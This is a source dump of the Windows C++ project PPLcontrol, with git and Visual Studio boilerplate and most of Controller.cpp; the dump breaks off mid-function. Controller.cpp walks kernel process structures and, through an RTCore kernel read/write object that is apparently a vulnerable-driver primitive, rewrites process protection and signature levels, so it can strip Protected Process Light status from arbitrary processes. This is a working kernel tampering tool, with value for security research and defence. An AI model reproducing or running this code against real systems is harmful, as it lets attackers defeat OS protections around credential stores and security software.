├── .gitattributes ├── .gitignore ├── PPLcontrol.sln ├── PPLcontrol ├── Controller.cpp ├── Controller.h ├── OffsetFinder.cpp ├── OffsetFinder.h ├── PPLcontrol.cpp ├── PPLcontrol.vcxproj ├── PPLcontrol.vcxproj.filters ├── RTCore.cpp ├── RTCore.h ├── Utils.cpp ├── Utils.h └── common.h └── README.md /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Oo]ut/ 33 | [Ll]og/ 34 | [Ll]ogs/ 35 | 36 | # Visual Studio 2015/2017 cache/options directory 37 | .vs/ 38 | # Uncomment if you have tasks that create the project's static files in wwwroot 39 | #wwwroot/ 40 | 41 | # Visual Studio 2017 auto generated files 42 | Generated\ Files/ 43 | 44 | # MSTest test Results 45 | [Tt]est[Rr]esult*/ 46 | [Bb]uild[Ll]og.* 47 | 48 | # NUnit 49 | *.VisualState.xml 50 | TestResult.xml 51 | nunit-*.xml 52 | 53 | # Build Results of an ATL Project 54 | [Dd]ebugPS/ 55 | [Rr]eleasePS/ 56 | dlldata.c 57 | 58 | # Benchmark Results 59 | BenchmarkDotNet.Artifacts/ 60 | 61 | # .NET Core 62 | project.lock.json 63 | project.fragment.lock.json 64 | artifacts/ 65 | 66 | # ASP.NET Scaffolding 67 | ScaffoldingReadMe.txt 68 | 69 | # StyleCop 70 | StyleCopReport.xml 71 | 72 | # Files built by Visual Studio 73 | *_i.c 74 | *_p.c 75 | *_h.h 76 | *.ilk 77 | *.meta 78 | *.obj 79 | *.iobj 80 | *.pch 81 | *.pdb 82 | *.ipdb 83 | *.pgc 84 | *.pgd 85 | *.rsp 86 | *.sbr 87 | *.tlb 88 | *.tli 89 | *.tlh 90 | *.tmp 91 | *.tmp_proj 92 | *_wpftmp.csproj 93 | *.log 94 | *.vspscc 95 | *.vssscc 96 | .builds 97 | *.pidb 98 | *.svclog 99 | *.scc 100 | 101 | # Chutzpah Test files 102 | _Chutzpah* 103 | 104 | # Visual C++ cache files 105 | ipch/ 106 | *.aps 107 | *.ncb 108 | *.opendb 109 | *.opensdf 110 | *.sdf 111 | *.cachefile 112 | *.VC.db 113 | *.VC.VC.opendb 114 | 115 | # Visual Studio profiler 116 | *.psess 117 | *.vsp 118 | *.vspx 119 | *.sap 120 | 121 | # Visual Studio Trace Files 122 | *.e2e 123 | 124 | # TFS 2012 Local Workspace 125 | $tf/ 126 | 127 | # Guidance Automation Toolkit 128 | *.gpState 129 | 130 | # ReSharper is a .NET coding add-in 131 | _ReSharper*/ 132 | *.[Rr]e[Ss]harper 133 | *.DotSettings.user 134 | 135 | # TeamCity is a build add-in 136 | _TeamCity* 137 | 138 | # DotCover is a Code Coverage Tool 139 | *.dotCover 140 | 141 | # AxoCover is a Code Coverage Tool 142 | .axoCover/* 143 | !.axoCover/settings.json 144 | 145 | # Coverlet is a free, cross platform Code Coverage Tool 146 | coverage*.json 147 | coverage*.xml 148 | coverage*.info 149 | 150 | # Visual Studio code coverage results 151 | *.coverage 152 | *.coveragexml 153 | 154 | # NCrunch 155 | _NCrunch_* 156 | .*crunch*.local.xml 157 | nCrunchTemp_* 158 | 159 | # MightyMoose 160 | *.mm.* 161 | AutoTest.Net/ 162 | 163 | # Web workbench (sass) 164 | .sass-cache/ 165 | 166 | # Installshield output folder 167 | [Ee]xpress/ 168 | 169 | # DocProject is a documentation generator add-in 170 | DocProject/buildhelp/ 171 | DocProject/Help/*.HxT 172 | DocProject/Help/*.HxC 173 | DocProject/Help/*.hhc 174 | DocProject/Help/*.hhk 175 | DocProject/Help/*.hhp 176 | DocProject/Help/Html2 177 | DocProject/Help/html 178 | 179 | # Click-Once directory 180 | publish/ 181 | 182 | # Publish Web Output 183 | *.[Pp]ublish.xml 184 | *.azurePubxml 185 | # Note: Comment the next line if you want to checkin your web deploy settings, 186 | # but database connection strings (with potential passwords) will be unencrypted 187 | *.pubxml 188 | *.publishproj 189 | 190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 191 | # checkin your Azure Web App publish settings, but sensitive information contained 192 | # in these scripts will be unencrypted 193 | PublishScripts/ 194 | 195 | # NuGet Packages 196 | *.nupkg 197 | # NuGet Symbol Packages 198 | *.snupkg 199 | # The packages folder can be ignored because of Package Restore 200 | **/[Pp]ackages/* 201 | # except build/, which is used as an MSBuild target. 202 | !**/[Pp]ackages/build/ 203 | # Uncomment if necessary however generally it will be regenerated when needed 204 | #!**/[Pp]ackages/repositories.config 205 | # NuGet v3's project.json files produces more ignorable files 206 | *.nuget.props 207 | *.nuget.targets 208 | 209 | # Microsoft Azure Build Output 210 | csx/ 211 | *.build.csdef 212 | 213 | # Microsoft Azure Emulator 214 | ecf/ 215 | rcf/ 216 | 217 | # Windows Store app package directories and files 218 | AppPackages/ 219 | BundleArtifacts/ 220 | Package.StoreAssociation.xml 221 | _pkginfo.txt 222 | *.appx 223 | *.appxbundle 224 | *.appxupload 225 | 226 | # Visual Studio cache files 227 | # files ending in .cache can be ignored 228 | *.[Cc]ache 229 | # but keep track of directories ending in .cache 230 | !?*.[Cc]ache/ 231 | 232 | # Others 233 | ClientBin/ 234 | ~$* 235 | *~ 236 | *.dbmdl 237 | *.dbproj.schemaview 238 | *.jfm 239 | *.pfx 240 | *.publishsettings 241 | orleans.codegen.cs 242 | 243 | # Including strong name files can present a security risk 244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 245 | #*.snk 246 | 247 | # Since there are multiple workflows, uncomment next line to ignore bower_components 248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 249 | #bower_components/ 250 | 251 | # RIA/Silverlight projects 252 | Generated_Code/ 253 | 254 | # Backup & report files from converting an old project file 255 | # to a newer Visual Studio version. Backup files are not needed, 256 | # because we have git ;-) 257 | _UpgradeReport_Files/ 258 | Backup*/ 259 | UpgradeLog*.XML 260 | UpgradeLog*.htm 261 | ServiceFabricBackup/ 262 | *.rptproj.bak 263 | 264 | # SQL Server files 265 | *.mdf 266 | *.ldf 267 | *.ndf 268 | 269 | # Business Intelligence projects 270 | *.rdl.data 271 | *.bim.layout 272 | *.bim_*.settings 273 | *.rptproj.rsuser 274 | *- [Bb]ackup.rdl 275 | *- [Bb]ackup ([0-9]).rdl 276 | *- [Bb]ackup ([0-9][0-9]).rdl 277 | 278 | # Microsoft Fakes 279 | FakesAssemblies/ 280 | 281 | # GhostDoc plugin setting file 282 | *.GhostDoc.xml 283 | 284 | # Node.js Tools for Visual Studio 285 | .ntvs_analysis.dat 286 | node_modules/ 287 | 288 | # Visual Studio 6 build log 289 | *.plg 290 | 291 | # Visual Studio 6 workspace options file 292 | *.opt 293 | 294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 295 | *.vbw 296 | 297 | # Visual Studio LightSwitch build output 298 | **/*.HTMLClient/GeneratedArtifacts 299 | **/*.DesktopClient/GeneratedArtifacts 300 | **/*.DesktopClient/ModelManifest.xml 301 | **/*.Server/GeneratedArtifacts 302 | **/*.Server/ModelManifest.xml 303 | _Pvt_Extensions 304 | 305 | # Paket dependency manager 306 | .paket/paket.exe 307 | paket-files/ 308 | 309 | # FAKE - F# Make 310 | .fake/ 311 | 312 | # CodeRush personal settings 313 | .cr/personal 314 | 315 | # Python Tools for Visual Studio (PTVS) 316 | __pycache__/ 317 | *.pyc 318 | 319 | # Cake - Uncomment if you are using it 320 | # tools/** 321 | # !tools/packages.config 322 | 323 | # Tabs Studio 324 | *.tss 325 | 326 | # Telerik's JustMock configuration file 327 | *.jmconfig 328 | 329 | # BizTalk build output 330 | *.btp.cs 331 | *.btm.cs 332 | *.odx.cs 333 | *.xsd.cs 334 | 335 | # OpenCover UI analysis results 336 | OpenCover/ 337 | 338 | # Azure Stream Analytics local run output 339 | ASALocalRun/ 340 | 341 | # MSBuild Binary and Structured Log 342 | *.binlog 343 | 344 | # NVidia Nsight GPU debugger configuration file 345 | *.nvuser 346 | 347 | # MFractors (Xamarin productivity tool) working folder 348 | .mfractor/ 349 | 350 | # Local History for Visual Studio 351 | .localhistory/ 352 | 353 | # BeatPulse healthcheck temp database 354 | healthchecksdb 355 | 356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 357 | MigrationBackup/ 358 | 359 | # Ionide (cross platform F# VS Code tools) working folder 360 | .ionide/ 361 | 362 | # Fody - auto-generated XML schema 363 | FodyWeavers.xsd -------------------------------------------------------------------------------- /PPLcontrol.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.32929.386 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PPLcontrol", "PPLcontrol\PPLcontrol.vcxproj", "{4F3DE11E-C54A-4DC1-AE8F-C29A720694CC}" 7 | EndProject 8 | Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{289A3B9C-15EE-40D6-B935-B085DDD532E6}" 9 | ProjectSection(SolutionItems) = preProject 10 | README.md = README.md 11 | EndProjectSection 12 | EndProject 13 | Global 14 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 15 | Debug|x64 = Debug|x64 16 | Debug|x86 = Debug|x86 17 | Release|x64 = Release|x64 18 | Release|x86 = Release|x86 19 | EndGlobalSection 20 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 21 | {4F3DE11E-C54A-4DC1-AE8F-C29A720694CC}.Debug|x64.ActiveCfg = Debug|x64 22 | {4F3DE11E-C54A-4DC1-AE8F-C29A720694CC}.Debug|x64.Build.0 = Debug|x64 23 | {4F3DE11E-C54A-4DC1-AE8F-C29A720694CC}.Debug|x86.ActiveCfg = Debug|Win32 24 | {4F3DE11E-C54A-4DC1-AE8F-C29A720694CC}.Debug|x86.Build.0 = Debug|Win32 25 | {4F3DE11E-C54A-4DC1-AE8F-C29A720694CC}.Release|x64.ActiveCfg = Release|x64 26 | {4F3DE11E-C54A-4DC1-AE8F-C29A720694CC}.Release|x64.Build.0 = Release|x64 27 | {4F3DE11E-C54A-4DC1-AE8F-C29A720694CC}.Release|x86.ActiveCfg = Release|Win32 28 | {4F3DE11E-C54A-4DC1-AE8F-C29A720694CC}.Release|x86.Build.0 = Release|Win32 29 | EndGlobalSection 30 | GlobalSection(SolutionProperties) = preSolution 31 | HideSolutionNode = FALSE 32 | EndGlobalSection 33 | GlobalSection(ExtensibilityGlobals) = postSolution 34 | SolutionGuid = {6314F007-4E69-4DEE-8AB4-D38008D70307} 35 | EndGlobalSection 36 | EndGlobal 37 | -------------------------------------------------------------------------------- /PPLcontrol/Controller.cpp: -------------------------------------------------------------------------------- 1 | #include "Controller.h" 2 | 3 | Controller::Controller() 4 | { 5 | _rtc = new RTCore(); 6 | _of = new OffsetFinder(); 7 | 8 | _of->FindAllOffsets(); 9 | } 10 | 11 | Controller::Controller(RTCore* rtc, OffsetFinder* of) 12 | { 13 | _rtc = rtc; 14 | _of = of; 15 | } 16 | 17 | BOOL Controller::ListProtectedProcesses() 18 | { 19 | PCTRL_PROCESS_INFO pProcessInfo = NULL; 20 | DWORD dwIndex, dwNumberOfProtectedProceses = 0; 21 | 22 | if (!GetProcessList(&pProcessInfo)) 23 | return FALSE; 24 | 25 | DEBUG(L"Number of process entries: %d", pProcessInfo->NumberOfEntries); 26 | 27 | wprintf(L"\n"); 28 | 29 | wprintf(L" PID | Level | Signer | EXE sig. level | DLL sig. level | Kernel addr. \n"); 30 | wprintf(L" -------+---------+-----------------+-----------------------+-----------------------+--------------------\n"); 31 | 32 | for (dwIndex = 0; dwIndex < pProcessInfo->NumberOfEntries; dwIndex++) 33 | { 34 | if (pProcessInfo->Entries[dwIndex].ProtectionLevel > 0) 35 | { 36 | wprintf(L" %6d | %-3ws (%d) | %-11ws (%d) | %-14ws (0x%02x) | %-14ws (0x%02x) | 0x%016llx\n", 37 | pProcessInfo->Entries[dwIndex].Pid, 38 | Utils::GetProtectionLevelAsString(pProcessInfo->Entries[dwIndex].ProtectionLevel), 39 | pProcessInfo->Entries[dwIndex].ProtectionLevel, 40 | Utils::GetSignerTypeAsString(pProcessInfo->Entries[dwIndex].SignerType), 41 | pProcessInfo->Entries[dwIndex].SignerType, 42 | Utils::GetSignatureLevelAsString(pProcessInfo->Entries[dwIndex].SignatureLevel), 43 | pProcessInfo->Entries[dwIndex].SignatureLevel, 44 | Utils::GetSignatureLevelAsString(pProcessInfo->Entries[dwIndex].SectionSignatureLevel), 45 | pProcessInfo->Entries[dwIndex].SectionSignatureLevel, 46 | pProcessInfo->Entries[dwIndex].KernelAddress 47 | ); 48 | 49 | dwNumberOfProtectedProceses++; 50 | } 51 | } 52 | 53 | wprintf(L"\n"); 54 | 55 | SUCCESS(L"Enumerated %d protected processes.", dwNumberOfProtectedProceses); 56 | 57 | HeapFree(GetProcessHeap(), 0, pProcessInfo); 58 | 59 | return TRUE; 60 | } 61 | 62 | BOOL Controller::GetProcessProtection(DWORD Pid) 63 | { 64 | ULONG_PTR pProcess; 65 | UCHAR bProtection; 66 | UCHAR bProtectionLevel, bSignerType; 67 | 68 | if (!GetProcessKernelAddress(Pid, &pProcess)) 69 | return FALSE; 70 | 71 | if (!GetProcessProtection(pProcess, &bProtection)) 72 | return FALSE; 73 | 74 | if (bProtection > 0) 75 | { 76 | bProtectionLevel = Utils::GetProtectionLevel(bProtection); 77 | bSignerType = Utils::GetSignerType(bProtection); 78 | 79 | SUCCESS(L"The process with PID %d is a %ws with the Signer type '%ws' (%d).", 80 | Pid, 81 | Utils::GetProtectionLevelAsString(bProtectionLevel), 82 | Utils::GetSignerTypeAsString(bSignerType), 83 | bSignerType 84 | ); 85 | } 86 | else 87 | { 88 | INFO(L"The process with PID %d is not protected.", Pid); 89 | } 90 | 91 | return TRUE; 92 | } 93 | 94 | BOOL Controller::SetProcessProtection(DWORD Pid, LPCWSTR ProtectionLevel, LPCWSTR SignerType) 95 | { 96 | ULONG_PTR pProcess; 97 | UCHAR bProtectionOld, bProtectionNew, bProtectionEffective; 98 | UCHAR bProtectionLevel, bSignerType; 99 | 100 | if (!(bProtectionLevel = Utils::GetProtectionLevelFromString(ProtectionLevel))) 101 | return FALSE; 102 | 103 | if (!(bSignerType = Utils::GetSignerTypeFromString(SignerType))) 104 | return FALSE; 105 | 106 | bProtectionNew = Utils::GetProtection(bProtectionLevel, bSignerType); 107 | 108 | if (!GetProcessKernelAddress(Pid, &pProcess)) 109 | return FALSE; 110 | 111 | if (!GetProcessProtection(pProcess, &bProtectionOld)) 112 | return FALSE; 113 | 114 | if (bProtectionOld == bProtectionNew) 115 | { 116 | ERROR(L"The process with PID %d already has the protection '%ws-%ws'.", 117 | Pid, 118 | Utils::GetProtectionLevelAsString(Utils::GetProtectionLevel(bProtectionOld)), 119 | Utils::GetSignerTypeAsString(Utils::GetSignerType(bProtectionOld)) 120 | ); 121 | 122 | return FALSE; 123 | } 124 | 125 | if (!SetProcessProtection(pProcess, bProtectionNew)) 126 | { 127 | ERROR(L"Failed to set Protection '%ws-%ws' on process with PID %d.", 128 | Utils::GetProtectionLevelAsString(bProtectionLevel), 129 | Utils::GetSignerTypeAsString(bSignerType), 130 | Pid 131 | ); 132 | 133 | return FALSE; 134 | } 135 | 136 | if (!GetProcessProtection(pProcess, &bProtectionEffective)) 137 | return FALSE; 138 | 139 | if (bProtectionNew != bProtectionEffective) 140 | { 141 | ERROR(L"Tried to set the protection '%ws-%ws', but the effective protection is: '%ws-%ws'.", 142 | Utils::GetProtectionLevelAsString(bProtectionLevel), 143 | Utils::GetSignerTypeAsString(bSignerType), 144 | Utils::GetProtectionLevelAsString(Utils::GetProtectionLevel(bProtectionEffective)), 145 | Utils::GetSignerTypeAsString(Utils::GetSignerType(bProtectionEffective)) 146 | ); 147 | 148 | return FALSE; 149 | } 150 | 151 | SUCCESS(L"The Protection '%ws-%ws' was set on the process with PID %d, previous protection was: '%ws-%ws'.", 152 | Utils::GetProtectionLevelAsString(bProtectionLevel), 153 | Utils::GetSignerTypeAsString(bSignerType), 154 | Pid, 155 | Utils::GetProtectionLevelAsString(Utils::GetProtectionLevel(bProtectionOld)), 156 | Utils::GetSignerTypeAsString(Utils::GetSignerType(bProtectionOld)) 157 | ); 158 | 159 | return TRUE; 160 | } 161 | 162 | BOOL Controller::GetProcessSignatureLevels(DWORD Pid) 163 | { 164 | ULONG_PTR pProcess; 165 | UCHAR bSignatureLevel, bSectionSignatureLevel; 166 | 167 | if (!GetProcessKernelAddress(Pid, &pProcess)) 168 | return FALSE; 169 | 170 | if (!GetProcessSignatureLevel(pProcess, &bSignatureLevel)) 171 | return FALSE; 172 | 173 | if (!GetProcessSectionSignatureLevel(pProcess, &bSectionSignatureLevel)) 174 | return FALSE; 175 | 176 | INFO(L"The process with PID %d has the Signature level '%ws' (0x%02x) and the Section signature level '%ws' (0x%02x).", 177 | Pid, 178 | Utils::GetSignatureLevelAsString(bSignatureLevel), 179 | bSignatureLevel, 180 | Utils::GetSignatureLevelAsString(bSectionSignatureLevel), 181 | bSectionSignatureLevel 182 | ); 183 | 184 | return TRUE; 185 | } 186 | 187 | BOOL Controller::SetProcessSignatureLevels(DWORD Pid, LPCWSTR SignerType) 188 | { 189 | ULONG_PTR pProcess; 190 | UCHAR bSignerType, bSignatureLevel, bSectionSignatureLevel; 191 | 192 | if (!(bSignerType = Utils::GetSignerTypeFromString(SignerType))) 193 | return FALSE; 194 | 195 | if ((bSignatureLevel = Utils::GetSignatureLevel(bSignerType)) == 0xff) 196 | return FALSE; 197 | 198 | if ((bSectionSignatureLevel = Utils::GetSectionSignatureLevel(bSignerType)) == 0xff) 199 | return FALSE; 200 | 201 | if (!GetProcessKernelAddress(Pid, &pProcess)) 202 | return FALSE; 203 | 204 | if (!SetProcessSignatureLevel(pProcess, bSignatureLevel)) 205 | return FALSE; 206 | 207 | if (!SetProcessSectionSignatureLevel(pProcess, bSectionSignatureLevel)) 208 | return FALSE; 209 | 210 | SUCCESS(L"The Signature level '%ws' and the Section signature level '%ws' were set on the process with PID %d.", 211 | Utils::GetSignatureLevelAsString(bSignatureLevel), 212 | Utils::GetSignatureLevelAsString(bSectionSignatureLevel), 213 | Pid 214 | ); 215 | 216 | return TRUE; 217 | } 218 | 219 | BOOL Controller::ProtectProcess(DWORD Pid, LPCWSTR ProtectionLevel, LPCWSTR SignerType) 220 | { 221 | ULONG_PTR pProcess; 222 | UCHAR bProtection; 223 | 224 | if (!GetProcessKernelAddress(Pid, &pProcess)) 225 | return FALSE; 226 | 227 | if (!GetProcessProtection(pProcess, &bProtection)) 228 | return FALSE; 229 | 230 | if (bProtection > 0) 231 | { 232 | ERROR(L"The process with PID %d is already protected, current protection is %ws-%ws.", 233 | Pid, 234 | Utils::GetProtectionLevelAsString(Utils::GetProtectionLevel(bProtection)), 235 | Utils::GetSignerTypeAsString(Utils::GetSignerType(bProtection)) 236 | ); 237 | 238 | return FALSE; 239 | } 240 | 241 | if (!SetProcessProtection(Pid, ProtectionLevel, SignerType)) 242 | return FALSE; 243 | 244 | if (!SetProcessSignatureLevels(Pid, SignerType)) 245 | return FALSE; 246 | 247 | return TRUE; 248 | } 249 | 250 | BOOL Controller::UnprotectProcess(DWORD Pid) 251 | { 252 | ULONG_PTR pProcess; 253 | UCHAR bProtection; 254 | 255 | if (!GetProcessKernelAddress(Pid, &pProcess)) 256 | return FALSE; 257 | 258 | if (!GetProcessProtection(pProcess, &bProtection)) 259 | return FALSE; 260 | 261 | if (bProtection == 0) 262 | { 263 | ERROR(L"The process with PID %d is not protected, nothing to unprotect.", Pid); 264 | return FALSE; 265 | } 266 | 267 | if (!SetProcessProtection(pProcess, 0)) 268 | { 269 | ERROR(L"Failed to set Protection level 'None' and Signer type 'None' on process with PID %d.", Pid); 270 | return FALSE; 271 | } 272 | 273 | if (!GetProcessProtection(pProcess, &bProtection)) 274 | return FALSE; 275 | 276 | if (bProtection != 0) 277 | { 278 | ERROR(L"The process with PID %d still appears to be protected.", Pid); 279 | return FALSE; 280 | } 281 | 282 | if (!SetProcessSignatureLevel(pProcess, SE_SIGNING_LEVEL_UNCHECKED)) 283 | { 284 | ERROR(L"Failed to set Signature level '%ws' (0x%02x) on process with PID %d.", 285 | Utils::GetSignatureLevelAsString(SE_SIGNING_LEVEL_UNCHECKED), 286 | SE_SIGNING_LEVEL_UNCHECKED, 287 | Pid 288 | ); 289 | 290 | return FALSE; 291 | } 292 | 293 | if (!SetProcessSectionSignatureLevel(pProcess, SE_SIGNING_LEVEL_UNCHECKED)) 294 | { 295 | ERROR(L"Failed to set Section signature level '%ws' (0x%02x) on process with PID %d.", 296 | Utils::GetSignatureLevelAsString(SE_SIGNING_LEVEL_UNCHECKED), 297 | SE_SIGNING_LEVEL_UNCHECKED, 298 | Pid 299 | ); 300 | 301 | return FALSE; 302 | } 303 | 304 | SUCCESS(L"The process with PID %d is no longer a PP(L).", Pid); 305 | 306 | return TRUE; 307 | } 308 | 309 | BOOL Controller::GetInitialSystemProcessAddress(PULONG_PTR Addr) 310 | { 311 | ULONG_PTR pKernelBase, pPsInitialSystemProcess, pInitialSystemProcess; 312 | 313 | *Addr = 0; 314 | 315 | if (!(pKernelBase = Utils::GetKernelBaseAddress())) 316 | return FALSE; 317 | 318 | if (!(pPsInitialSystemProcess = Utils::GetKernelAddress(pKernelBase, _of->GetOffset(Offset::KernelPsInitialSystemProcess)))) 319 | return FALSE; 320 | 321 | DEBUG(L"%ws @ 0x%016llx\n", OF_STR_PSINITIALSYSTEMPROCESS_SYMBOL_NAME_W, pPsInitialSystemProcess); 322 | 323 | if (!(_rtc->ReadPtr(pPsInitialSystemProcess, &pInitialSystemProcess))) 324 | return FALSE; 325 | 326 | DEBUG(L"System process @ 0x%016llx\n", pInitialSystemProcess); 327 | 328 | *Addr = pInitialSystemProcess; 329 | 330 | return TRUE; 331 | } 332 | 333 | BOOL Controller::GetProcessKernelAddress(DWORD Pid, PULONG_PTR Addr) 334 | { 335 | PCTRL_PROCESS_INFO pProcessInfo = NULL; 336 | DWORD dwIndex; 337 | ULONG_PTR pProcess = 0; 338 | 339 | if (!GetProcessList(&pProcessInfo)) 340 | return FALSE; 341 | 342 | for (dwIndex = 0; dwIndex < pProcessInfo->NumberOfEntries; dwIndex++) 343 | { 344 | if (pProcessInfo->Entries[dwIndex].Pid == Pid) 345 | { 346 | pProcess = pProcessInfo->Entries[dwIndex].KernelAddress; 347 | break; 348 | } 349 | } 350 | 351 | HeapFree(GetProcessHeap(), 0, pProcessInfo); 352 | 353 | if (pProcess == 0) 354 | { 355 | ERROR(L"Failed to retrieve Kernel address of process with PID %d.", Pid); 356 | return FALSE; 357 | } 358 | 359 | *Addr = pProcess; 360 | 361 | return TRUE; 362 | } 363 | 364 | BOOL Controller::GetProcessList(PCTRL_PROCESS_INFO *List) 365 | { 366 | BOOL bResult = FALSE; 367 | PCTRL_PROCESS_INFO pProcessList = NULL, pProcessListNew; 368 | DWORD dwBaseSize = 4096, dwSize, dwNumberOfEntries = 0; 369 | DWORD64 dwProcessId; 370 | ULONG_PTR pProcess, pInitialSystemProcess; 371 | UCHAR bProtection, bSignatureLevel, bSectionSignatureLevel; 372 | 373 | if (!(pProcessList = (PCTRL_PROCESS_INFO)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwBaseSize))) 374 | return FALSE; 375 | 376 | dwSize = sizeof(pProcessList->NumberOfEntries); 377 | 378 | if (!GetInitialSystemProcessAddress(&pInitialSystemProcess)) 379 | return FALSE; 380 | 381 | pProcess = pInitialSystemProcess; 382 | 383 | do 384 | { 385 | if (!(_rtc->Read64(pProcess + _of->GetOffset(Offset::ProcessUniqueProcessId), &dwProcessId))) 386 | break; 387 | 388 | DEBUG(L"Process @ 0x%016llx has PID %d\n", pProcess, (DWORD)dwProcessId); 389 | 390 | if (!GetProcessProtection(pProcess, &bProtection)) 391 | break; 392 | 393 | if (!GetProcessSignatureLevel(pProcess, &bSignatureLevel)) 394 | break; 395 | 396 | if (!GetProcessSectionSignatureLevel(pProcess, &bSectionSignatureLevel)) 397 | break; 398 | 399 | dwSize += sizeof((*List)[0]); 400 | 401 | if (dwSize >= dwBaseSize) 402 | { 403 | dwBaseSize *= 2; 404 | if (!(pProcessListNew = (PCTRL_PROCESS_INFO)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pProcessList, dwBaseSize))) 405 | break; 406 | 407 | pProcessList = pProcessListNew; 408 | } 409 | 410 | pProcessList->Entries[dwNumberOfEntries].KernelAddress = pProcess; 411 | pProcessList->Entries[dwNumberOfEntries].Pid = (DWORD)dwProcessId; 412 | pProcessList->Entries[dwNumberOfEntries].ProtectionLevel = Utils::GetProtectionLevel(bProtection); 413 | pProcessList->Entries[dwNumberOfEntries].SignerType = Utils::GetSignerType(bProtection); 414 | pProcessList->Entries[dwNumberOfEntries].SignatureLevel = bSignatureLevel; 415 | pProcessList->Entries[dwNumberOfEntries].SectionSignatureLevel = bSectionSignatureLevel; 416 | 417 | dwNumberOfEntries++; 418 | 419 | if (!(_rtc->ReadPtr(pProcess + _of->GetOffset(Offset::ProcessActiveProcessLinks), &pProcess))) 420 | break; 421 | 422 | pProcess = pProcess - _of->GetOffset(Offset::ProcessActiveProcessLinks); 423 | 424 | } while (pProcess != pInitialSystemProcess); 425 | 426 | if (pProcess == pInitialSystemProcess) 427 | { 428 | pProcessList->NumberOfEntries = dwNumberOfEntries; 429 | bResult = TRUE; 430 | *List = pProcessList; 431 | } 432 | 433 | if (!bResult && pProcessList) 434 | HeapFree(GetProcessHeap(), 0, pProcessList); 435 | 436 | return bResult; 437 | } 438 | 439 | BOOL Controller::GetProcessProtection(ULONG_PTR Addr, PUCHAR Protection) 440 | { 441 | UCHAR bProtection; 442 | 443 | if (!(_rtc->Read8(Addr + _of->GetOffset(Offset::ProcessProtection), &bProtection))) 444 | { 445 | #ifdef _WIN64 446 | ERROR(L"Failed to retrieve Protection attribute of process @ 0x%016llx.", Addr); 447 | #else 448 | ERROR(L"Failed to retrieve Protection attribute of process @ 0x%08x.", Addr); 449 | #endif 450 | return FALSE; 451 | } 452 | 453 | *Protection = bProtection; 454 | 455 | return TRUE; 456 | } 457 | 458 | BOOL Controller::SetProcessProtection(ULONG_PTR Addr, UCHAR Protection) 459 | { 460 | return _rtc->Write8(Addr + _of->GetOffset(Offset::ProcessProtection), Protection); 461 | } 462 | 463 | BOOL Controller::GetProcessSignatureLevel(ULONG_PTR Addr, PUCHAR SignatureLevel) 464 | { 465 | UCHAR bSignatureLevel; 466 | 467 | if (!(_rtc->Read8(Addr + _of->GetOffset(Offset::ProcessSignatureLevel), &bSignatureLevel))) 468 | { 469 | #ifdef _WIN64 470 | ERROR(L"Failed to retrieve SignatureLevel attribute of process @ 0x%016llx.", Addr); 471 | #else 472 | ERROR(L"Failed to retrieve SignatureLevel attribute of process @ 0x%08x.", Addr); 473 | #endif 474 | return FALSE; 475 | } 476 | 477 | *SignatureLevel = bSignatureLevel; 478 | 